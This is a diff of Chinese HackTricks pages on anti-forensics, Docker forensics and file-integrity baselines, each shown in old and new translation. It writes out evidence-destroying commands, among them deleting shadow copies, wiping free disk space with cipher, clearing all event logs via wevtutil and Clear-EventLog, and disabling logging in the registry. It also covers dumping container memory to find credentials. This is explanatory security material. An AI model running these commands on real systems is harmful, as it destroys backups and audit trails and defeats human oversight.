学习和实践GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>从零开始学习AWS黑客技术,成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE(HackTricks AWS红队专家)</strong></a><strong>!</strong></summary>
|
||||
<summary>支持 HackTricks</summary>
|
||||
|
||||
支持HackTricks的其他方式:
|
||||
|
||||
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
|
||||
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或在**Twitter**上关注我们 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**。**
|
||||
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
|
||||
* 检查[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**telegram 群组**](https://t.me/peass) 或 **关注**我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||||
* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享黑客技巧。
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
||||
<figure><img src="https://pentest.eu/RENDER_WebSec_10fps_21sec_9MB_29042024.gif" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
{% embed url="https://websec.nl/" %}
|
||||
|
||||
|
||||
# 时间戳
|
||||
|
||||
攻击者可能对**更改文件的时间戳**感兴趣,以避免被检测到。\
|
||||
可以在MFT中的属性`$STANDARD_INFORMATION`和`$FILE_NAME`中找到时间戳。
|
||||
攻击者可能有兴趣**更改文件的时间戳**以避免被检测。\
|
||||
可以在 MFT 中的属性 `$STANDARD_INFORMATION` 和 `$FILE_NAME` 中找到时间戳。
|
||||
|
||||
这两个属性都有4个时间戳:**修改**,**访问**,**创建**和**MFT注册修改**(MACE或MACB)。
|
||||
这两个属性都有 4 个时间戳:**修改**、**访问**、**创建** 和 **MFT 注册修改**(MACE 或 MACB)。
|
||||
|
||||
**Windows资源管理器**和其他工具显示来自**`$STANDARD_INFORMATION`**的信息。
|
||||
**Windows 资源管理器**和其他工具显示来自 **`$STANDARD_INFORMATION`** 的信息。
|
||||
|
||||
## TimeStomp - 反取证工具
|
||||
|
||||
该工具**修改**了**`$STANDARD_INFORMATION`**中的时间戳信息,**但没有**修改**`$FILE_NAME`**中的信息。因此,可以**识别**出**可疑活动**。
|
||||
该工具**修改**了 **`$STANDARD_INFORMATION`** 中的时间戳信息,**但不会**修改 **`$FILE_NAME`** 中的信息。因此,可以**识别**出**可疑活动**。
|
||||
|
||||
## Usnjrnl
|
||||
|
||||
**USN日志**(更新序列号日志)是NTFS(Windows NT文件系统)的一个功能,用于跟踪卷的更改。[**UsnJrnl2Csv**](https://github.com/jschicht/UsnJrnl2Csv)工具允许检查这些更改。
|
||||
**USN 日志**(Update Sequence Number Journal)是 NTFS(Windows NT 文件系统)的一个功能,用于跟踪卷的更改。[**UsnJrnl2Csv**](https://github.com/jschicht/UsnJrnl2Csv) 工具允许检查这些更改。
|
||||
|
||||
![](<../../.gitbook/assets/image (449).png>)
|
||||
|
||||
上图是该**工具显示的输出**,可以观察到对文件进行了一些**更改**。
|
||||
上图是该工具显示的**输出**,可以观察到对文件进行了一些**更改**。
|
||||
|
||||
## $LogFile
|
||||
|
||||
**文件系统中的所有元数据更改都会被记录**,这个过程称为[预写式日志记录](https://en.wikipedia.org/wiki/Write-ahead_logging)。记录的元数据保存在名为`**$LogFile**`的文件中,位于NTFS文件系统的根目录中。可以使用诸如[LogFileParser](https://github.com/jschicht/LogFileParser)之类的工具来解析此文件并识别更改。
|
||||
**文件系统中的所有元数据更改都会被记录**,这个过程称为[预写式日志记录](https://en.wikipedia.org/wiki/Write-ahead_logging)。记录的元数据保存在名为 `**$LogFile**` 的文件中,位于 NTFS 文件系统的根目录中。可以使用诸如 [LogFileParser](https://github.com/jschicht/LogFileParser) 的工具来解析此文件并识别更改。
|
||||
|
||||
![](<../../.gitbook/assets/image (450).png>)
|
||||
|
||||
再次,在工具的输出中,可以看到**进行了一些更改**。
|
||||
再次,在工具的输出中可以看到**进行了一些更改**。
|
||||
|
||||
使用相同的工具,可以确定**时间戳何时被修改**:
|
||||
|
||||
|
@ -52,112 +52,112 @@
|
|||
|
||||
* CTIME:文件的创建时间
|
||||
* ATIME:文件的修改时间
|
||||
* MTIME:文件的MFT注册修改时间
|
||||
* MTIME:文件的 MFT 注册修改
|
||||
* RTIME:文件的访问时间
|
||||
|
||||
## `$STANDARD_INFORMATION`和`$FILE_NAME`比较
|
||||
## `$STANDARD_INFORMATION` 和 `$FILE_NAME` 比较
|
||||
|
||||
另一种识别可疑修改文件的方法是比较两个属性上的时间,寻找**不匹配**。
|
||||
|
||||
## 纳秒
|
||||
|
||||
**NTFS**时间戳的**精度**为**100纳秒**。因此,找到时间戳为2010-10-10 10:10:**00.000:0000的文件非常可疑**。
|
||||
**NTFS** 时间戳的**精度**为**100 纳秒**。因此,找到时间戳为 2010-10-10 10:10:**00.000:0000 的文件非常可疑。
|
||||
|
||||
## SetMace - 反取证工具
|
||||
|
||||
该工具可以修改`$STARNDAR_INFORMATION`和`$FILE_NAME`两个属性。但是,从Windows Vista开始,需要一个实时操作系统来修改此信息。
|
||||
该工具可以修改 `$STARNDAR_INFORMATION` 和 `$FILE_NAME` 两个属性。但是,从 Windows Vista 开始,需要一个实时操作系统来修改这些信息。
|
||||
|
||||
# 数据隐藏
|
||||
|
||||
NFTS使用一个簇和最小信息大小。这意味着如果一个文件占用一个半簇,**剩余的一半将永远不会被使用**,直到文件被删除。因此,可以**在这个空闲空间中隐藏数据**。
|
||||
NFTS 使用一个簇和最小信息大小。这意味着如果一个文件占用一个半簇,**剩余的一半将永远不会被使用**,直到文件被删除。因此,可以**在这个空闲空间中隐藏数据**。
|
||||
|
||||
有一些工具,如slacker,允许在这个“隐藏”空间中隐藏数据。但是,对`$logfile`和`$usnjrnl`的分析可以显示添加了一些数据:
|
||||
有一些工具如 slacker 允许在这个“隐藏”空间中隐藏数据。然而,对 `$logfile` 和 `$usnjrnl` 的分析可以显示添加了一些数据:
|
||||
|
||||
![](<../../.gitbook/assets/image (452).png>)
|
||||
|
||||
然后,可以使用FTK Imager等工具检索空闲空间。请注意,这种工具可以保存内容混淆或甚至加密。
|
||||
因此,可以使用 FTK Imager 等工具检索空闲空间。请注意,这种工具可以保存内容混淆或甚至加密。
|
||||
|
||||
# UsbKill
|
||||
|
||||
这是一个工具,如果检测到USB端口发生任何更改,将**关闭计算机**。\
|
||||
发现这一点的方法是检查运行中的进程,并**审查每个运行的Python脚本**。
|
||||
这是一个工具,如果检测到 USB 端口发生任何更改,将**关闭计算机**。\
|
||||
发现这一点的方法是检查运行中的进程并**审查每个运行的 Python 脚本**。
|
||||
|
||||
# 实时Linux发行版
|
||||
# 实时 Linux 发行版
|
||||
|
||||
这些发行版是**在RAM内存中执行**的。唯一能够检测到它们的方法是**在NTFS文件系统挂载为可写权限**的情况下。如果只挂载为只读权限,则无法检测到入侵。
|
||||
这些发行版是**在 RAM 内存中执行**的。唯一能够检测到它们的方法是**如果 NTFS 文件系统以写权限挂载**。如果只以读权限挂载,将无法检测到入侵。
|
||||
|
||||
# 安全删除
|
||||
|
||||
[https://github.com/Claudio-C/awesome-data-sanitization](https://github.com/Claudio-C/awesome-data-sanitization)
|
||||
|
||||
# Windows配置
|
||||
# Windows 配置
|
||||
|
||||
可以禁用几种Windows日志记录方法,使取证调查变得更加困难。
|
||||
可以禁用多种 Windows 日志记录方法,使取证调查变得更加困难。
|
||||
|
||||
## 禁用时间戳 - UserAssist
|
||||
|
||||
这是一个维护用户运行每个可执行文件的日期和时间的注册表键。
|
||||
|
||||
禁用UserAssist需要两个步骤:
|
||||
禁用 UserAssist 需要两个步骤:
|
||||
|
||||
1. 设置两个注册表键,`HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Start_TrackProgs`和`HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Start_TrackEnabled`,都设置为零,以表示我们要禁用UserAssist。
|
||||
2. 清除类似`HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\<hash>`的注册表子树。
|
||||
1. 设置两个注册表键,`HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Start_TrackProgs` 和 `HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Start_TrackEnabled`,都设置为零,以表示我们要禁用 UserAssist。
|
||||
2. 清除类似 `HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\<hash>` 的注册表子树。
|
||||
|
||||
## 禁用时间戳 - Prefetch
|
||||
|
||||
这将保存有关执行的应用程序的信息,目的是提高Windows系统的性能。但是,这也可以用于取证实践。
|
||||
这将保存有关执行的应用程序的信息,目的是改善 Windows 系统的性能。但是,这也对取证实践有用。
|
||||
|
||||
* 执行`regedit`
|
||||
* 选择文件路径`HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SessionManager\Memory Management\PrefetchParameters`
|
||||
* 右键单击`EnablePrefetcher`和`EnableSuperfetch`
|
||||
* 对每个进行修改,将值从1(或3)更改为0
|
||||
* 执行 `regedit`
|
||||
* 选择文件路径 `HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SessionManager\Memory Management\PrefetchParameters`
|
||||
* 右键单击 `EnablePrefetcher` 和 `EnableSuperfetch`
|
||||
* 对每个都选择修改,将值从 1(或 3)更改为 0
|
||||
* 重新启动
|
||||
|
||||
## 禁用时间戳 - 最后访问时间
|
||||
|
||||
每当从Windows NT服务器上的NTFS卷中打开文件夹时,系统会花费时间**更新每个列出文件夹的时间戳字段**,称为最后访问时间。在使用频繁的NTFS卷上,这可能会影响性能。
|
||||
每当从 Windows NT 服务器上的 NTFS 卷打开文件夹时,系统会花时间**更新列出的每个文件夹的时间戳字段**,称为最后访问时间。在使用频繁的 NTFS 卷上,这可能会影响性能。
|
||||
|
||||
1. 打开注册表编辑器(Regedit.exe)。
|
||||
2. 浏览到`HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\FileSystem`。
|
||||
3. 查找`NtfsDisableLastAccessUpdate`。如果不存在,请添加此DWORD并将其值设置为1,以禁用该过程。
|
||||
2. 浏览到 `HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\FileSystem`。
|
||||
3. 查找 `NtfsDisableLastAccessUpdate`。如果不存在,请添加此 DWORD 并将其值设置为 1,以禁用该过程。
|
||||
4. 关闭注册表编辑器,并重新启动服务器。
|
||||
## 删除 USB 历史记录
|
||||
|
||||
所有的**USB 设备条目**都存储在 Windows 注册表的 **USBSTOR** 注册表键下,其中包含子键,每当您将 USB 设备插入 PC 或笔记本电脑时就会创建。您可以在此处找到此键 `HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\USBSTOR`。**删除**这个键将删除 USB 历史记录。\
|
||||
所有的 **USB 设备条目** 都存储在 Windows 注册表中的 **USBSTOR** 注册表键下,其中包含子键,每当您将 USB 设备插入 PC 或笔记本电脑时就会创建。您可以在此处找到此键 `HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\USBSTOR`。**删除此** 将删除 USB 历史记录。\
|
||||
您也可以使用工具 [**USBDeview**](https://www.nirsoft.net/utils/usb_devices_view.html) 来确保已删除它们(并删除它们)。
|
||||
|
||||
另一个保存有关 USB 的信息的文件是位于 `C:\Windows\INF` 内的文件 `setupapi.dev.log`。这也应该被删除。
|
||||
|
||||
## 禁用阴影副本
|
||||
|
||||
使用 `vssadmin list shadowstorage` 命令**列出**阴影副本\
|
||||
运行 `vssadmin delete shadow` 命令**删除**它们
|
||||
使用 `vssadmin list shadowstorage` **列出**阴影副本\
|
||||
运行 `vssadmin delete shadow` **删除**它们
|
||||
|
||||
您还可以通过 GUI 删除它们,按照 [https://www.ubackup.com/windows-10/how-to-delete-shadow-copies-windows-10-5740.html](https://www.ubackup.com/windows-10/how-to-delete-shadow-copies-windows-10-5740.html) 中提出的步骤进行操作。
|
||||
|
||||
要禁用阴影副本,请按照[此处的步骤](https://support.waters.com/KB_Inf/Other/WKB15560_How_to_disable_Volume_Shadow_Copy_Service_VSS_in_Windows):
|
||||
|
||||
1. 通过在单击 Windows 启动按钮后输入“services”到文本搜索框中打开服务程序。
|
||||
2. 从列表中找到“Volume Shadow Copy”,选择它,然后通过右键单击访问属性。
|
||||
3. 从“启动类型”下拉菜单中选择“禁用”,然后通过单击“应用”和“确定”来确认更改。
|
||||
1. 通过在单击 Windows 启动按钮后的文本搜索框中键入 "services" 来打开服务程序。
|
||||
2. 从列表中找到 "Volume Shadow Copy",选择它,然后通过右键单击访问属性。
|
||||
3. 从 "启动类型" 下拉菜单中选择禁用,然后通过单击应用和确定来确认更改。
|
||||
|
||||
还可以在注册表 `HKLM\SYSTEM\CurrentControlSet\Control\BackupRestore\FilesNotToSnapshot` 中修改要复制到阴影副本中的文件的配置。
|
||||
|
||||
## 覆盖已删除的文件
|
||||
|
||||
* 您可以使用一个**Windows 工具**:`cipher /w:C` 这将指示 cipher 从 C 驱动器中的可用未使用磁盘空间中删除任何数据。
|
||||
* 您还可以使用 [**Eraser**](https://eraser.heidi.ie) 等工具
|
||||
* 您可以使用一个 **Windows 工具**:`cipher /w:C` 这将指示 cipher 从 C 驱动器内的可用未使用磁盘空间中删除任何数据。
|
||||
* 您还可以使用类似 [**Eraser**](https://eraser.heidi.ie) 的工具
|
||||
|
||||
## 删除 Windows 事件日志
|
||||
|
||||
* Windows + R --> eventvwr.msc --> 展开“Windows 日志” --> 右键单击每个类别并选择“清除日志”
|
||||
* Windows + R --> eventvwr.msc --> 展开 "Windows 日志" --> 右键单击每个类别,然后选择 "清除日志"
|
||||
* `for /F "tokens=*" %1 in ('wevtutil.exe el') DO wevtutil.exe cl "%1"`
|
||||
* `Get-EventLog -LogName * | ForEach { Clear-EventLog $_.Log }`
|
||||
|
||||
## 禁用 Windows 事件日志
|
||||
|
||||
* `reg add 'HKLM\SYSTEM\CurrentControlSet\Services\eventlog' /v Start /t REG_DWORD /d 4 /f`
|
||||
* 在服务部分内禁用服务“Windows 事件日志”
|
||||
* 在服务部分内禁用服务 "Windows 事件日志"
|
||||
* `WEvtUtil.exec clear-log` 或 `WEvtUtil.exe cl`
|
||||
|
||||
## 禁用 $UsnJrnl
|
||||
|
@ -169,16 +169,17 @@ NFTS使用一个簇和最小信息大小。这意味着如果一个文件占用
|
|||
{% embed url="https://websec.nl/" %}
|
||||
|
||||
|
||||
{% hint style="success" %}
|
||||
学习并练习 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
学习并练习 GCP 黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>从零开始学习 AWS 黑客技术,成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE(HackTricks AWS 红队专家)</strong></a><strong>!</strong></summary>
|
||||
<summary>支持 HackTricks</summary>
|
||||
|
||||
支持 HackTricks 的其他方式:
|
||||
|
||||
* 如果您想看到您的**公司在 HackTricks 中做广告**或**下载 PDF 版本的 HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* 获取[**官方 PEASS & HackTricks 商品**](https://peass.creator-spring.com)
|
||||
* 发现[**PEASS 家族**](https://opensea.io/collection/the-peass-family),我们的独家[NFT](https://opensea.io/collection/the-peass-family)收藏品
|
||||
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或在 **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live) 上关注我们。
|
||||
* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享您的黑客技巧。
|
||||
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**。**
|
||||
* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享黑客技巧。
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
|
|
@ -1,18 +1,19 @@
|
|||
# Docker取证
|
||||
|
||||
{% hint style="success" %}
|
||||
学习并实践AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks培训AWS红队专家(ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
学习并实践GCP Hacking:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks培训GCP红队专家(GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>从零开始学习AWS黑客技术,成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE(HackTricks AWS红队专家)</strong></a><strong>!</strong></summary>
|
||||
<summary>支持HackTricks</summary>
|
||||
|
||||
支持HackTricks的其他方式:
|
||||
|
||||
* 如果您想看到您的**公司在HackTricks中被广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* 获取[**官方PEASS和HackTricks周边产品**](https://peass.creator-spring.com)
|
||||
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**。**
|
||||
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
|
||||
* 检查[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||||
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享黑客技巧。
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
||||
## 容器修改
|
||||
|
||||
|
@ -22,7 +23,7 @@ docker ps
|
|||
CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES
|
||||
cc03e43a052a lamp-wordpress "./run.sh" 2 minutes ago Up 2 minutes 80/tcp wordpress
|
||||
```
|
||||
您可以轻松地使用以下命令查找有关此容器对镜像所做修改:
|
||||
您可以使用以下命令轻松**查找对此容器所做的与镜像相关的修改**:
|
||||
```bash
|
||||
docker diff wordpress
|
||||
C /var
|
||||
|
@ -41,26 +42,26 @@ A /var/lib/mysql/mysql/general_log.CSV
|
|||
```bash
|
||||
docker cp wordpress:/etc/shadow.
|
||||
```
|
||||
您还可以通过运行一个新容器并从中提取文件来**与原始文件进行比较**:
|
||||
你也可以通过运行一个新的容器并从中提取文件来**与原始文件进行比较**:
|
||||
```bash
|
||||
docker run -d lamp-wordpress
|
||||
docker cp b5d53e8b468e:/etc/shadow original_shadow #Get the file from the newly created container
|
||||
diff original_shadow shadow
|
||||
```
|
||||
如果发现**添加了一些可疑文件**,您可以访问容器并进行检查:
|
||||
如果发现**已添加一些可疑文件**,您可以访问容器并进行检查:
|
||||
```bash
|
||||
docker exec -it wordpress bash
|
||||
```
|
||||
## 图像修改
|
||||
|
||||
当您获得一个导出的 Docker 镜像(可能是 `.tar` 格式)时,您可以使用 [**container-diff**](https://github.com/GoogleContainerTools/container-diff/releases) 来 **提取修改的摘要**:
|
||||
当您获得一个导出的 Docker 镜像(可能是 `.tar` 格式)时,您可以使用 [**container-diff**](https://github.com/GoogleContainerTools/container-diff/releases) 来**提取修改的摘要**:
|
||||
```bash
|
||||
docker save <image> > image.tar #Export the image to a .tar file
|
||||
container-diff analyze -t sizelayer image.tar
|
||||
container-diff analyze -t history image.tar
|
||||
container-diff analyze -t metadata image.tar
|
||||
```
|
||||
然后,您可以**解压**图像并**访问 blobs**,以搜索您在更改历史记录中发现的可疑文件:
|
||||
然后,您可以**解压**图像并**访问** blobs 以搜索您在更改历史记录中发现的可疑文件:
|
||||
```bash
|
||||
tar -xf image.tar
|
||||
```
|
||||
|
@ -70,7 +71,7 @@ tar -xf image.tar
|
|||
```bash
|
||||
docker inspect <image>
|
||||
```
|
||||
您还可以使用以下命令获取**更改历史记录摘要**:
|
||||
您还可以使用以下命令获取**更改历史摘要**:
|
||||
```bash
|
||||
docker history --no-trunc <image>
|
||||
```
|
||||
|
@ -90,9 +91,9 @@ Loaded image: flask:latest
|
|||
#And then open it with dive:
|
||||
sudo dive flask:latest
|
||||
```
|
||||
这使您能够**浏览Docker镜像的不同blob**,并检查哪些文件已被修改/添加。**红色**表示已添加,**黄色**表示已修改。使用**tab**键切换到其他视图,使用**空格**键折叠/打开文件夹。
|
||||
这使您能够**浏览 Docker 镜像的不同 blob**,并检查哪些文件已被修改/添加。**红色**表示已添加,**黄色**表示已修改。使用**tab**键切换到其他视图,使用**空格**键折叠/打开文件夹。
|
||||
|
||||
使用die,您将无法访问镜像不同阶段的内容。要这样做,您需要**解压缩每个层并访问它**。\
|
||||
使用 die,您将无法访问镜像不同阶段的内容。要这样做,您需要**解压缩每个层并访问它**。\
|
||||
您可以从解压缩镜像的目录中解压缩图像的所有层,执行:
|
||||
```bash
|
||||
tar -xf image.tar
|
||||
|
@ -100,6 +101,21 @@ for d in `find * -maxdepth 0 -type d`; do cd $d; tar -xf ./layer.tar; cd ..; don
|
|||
```
|
||||
## 从内存中获取凭据
|
||||
|
||||
请注意,当您在主机内运行一个docker容器时,**您可以从主机上运行`ps -ef`命令来查看容器中运行的进程**
|
||||
请注意,当您在主机内运行一个 Docker 容器时,**您可以通过在主机上运行 `ps -ef` 命令来查看容器中运行的进程**
|
||||
|
||||
因此(作为root用户)您可以从主机中**转储进程的内存**,并搜索凭据,就像[**以下示例**](../../linux-hardening/privilege-escalation/#process-memory)中一样。
|
||||
因此(作为 root 用户)您可以从主机中**转储进程的内存**,并搜索**凭据**,就像[**以下示例**](../../linux-hardening/privilege-escalation/#process-memory)中一样。
|
||||
|
||||
{% hint style="success" %}
|
||||
学习并练习 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
学习并练习 GCP 黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary>支持 HackTricks</summary>
|
||||
|
||||
* 查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **关注**我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||||
* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享黑客技巧。
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
|
|
@ -1,30 +1,31 @@
|
|||
{% hint style="success" %}
|
||||
学习和实践AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
学习和实践GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>从零开始学习AWS黑客技术,成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE(HackTricks AWS红队专家)</strong></a><strong>!</strong></summary>
|
||||
<summary>支持 HackTricks</summary>
|
||||
|
||||
支持HackTricks的其他方式:
|
||||
|
||||
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
|
||||
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们独家的[**NFTs**](https://opensea.io/collection/the-peass-family)收藏品
|
||||
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或在**Twitter**上关注我们 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**。**
|
||||
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
|
||||
* 检查 [**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**telegram 群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||||
* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享黑客技巧。
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
||||
|
||||
# 基线
|
||||
|
||||
基线包括对系统的某些部分进行快照,以便**将来与之进行比较以突出变化**。
|
||||
基线包括对系统的某些部分进行快照,以便与将来的状态进行比较以突出变化。
|
||||
|
||||
例如,您可以计算并存储文件系统中每个文件的哈希值,以便找出哪些文件已被修改。\
|
||||
还可以对创建的用户帐户、运行的进程、运行的服务以及任何其他不应该或根本不应该发生太多变化的事物进行此操作。
|
||||
这也可以用于创建的用户帐户、运行的进程、运行的服务以及任何其他不应该或根本不应该发生太多变化的事物。
|
||||
|
||||
## 文件完整性监控
|
||||
|
||||
文件完整性监控(FIM)是一种关键的安全技术,通过跟踪文件的更改来保护IT环境和数据。它包括两个关键步骤:
|
||||
文件完整性监控(FIM)是一种关键的安全技术,通过跟踪文件的更改来保护 IT 环境和数据。它包括两个关键步骤:
|
||||
|
||||
1. **基线比较:** 使用文件属性或加密校验和(如MD5或SHA-2)建立基线,以便将来进行比较以检测修改。
|
||||
1. **基线比较:** 使用文件属性或加密校验和(如 MD5 或 SHA-2)建立基线,以便将来进行比较以检测修改。
|
||||
2. **实时更改通知:** 当文件被访问或更改时立即收到警报,通常通过操作系统内核扩展。
|
||||
|
||||
## 工具
|
||||
|
@ -32,21 +33,22 @@
|
|||
* [https://github.com/topics/file-integrity-monitoring](https://github.com/topics/file-integrity-monitoring)
|
||||
* [https://www.solarwinds.com/security-event-manager/use-cases/file-integrity-monitoring-software](https://www.solarwinds.com/security-event-manager/use-cases/file-integrity-monitoring-software)
|
||||
|
||||
# 参考资料
|
||||
## 参考资料
|
||||
|
||||
* [https://cybersecurity.att.com/blogs/security-essentials/what-is-file-integrity-monitoring-and-why-you-need-it](https://cybersecurity.att.com/blogs/security-essentials/what-is-file-integrity-monitoring-and-why-you-need-it)
|
||||
|
||||
|
||||
{% hint style="success" %}
|
||||
学习和实践AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
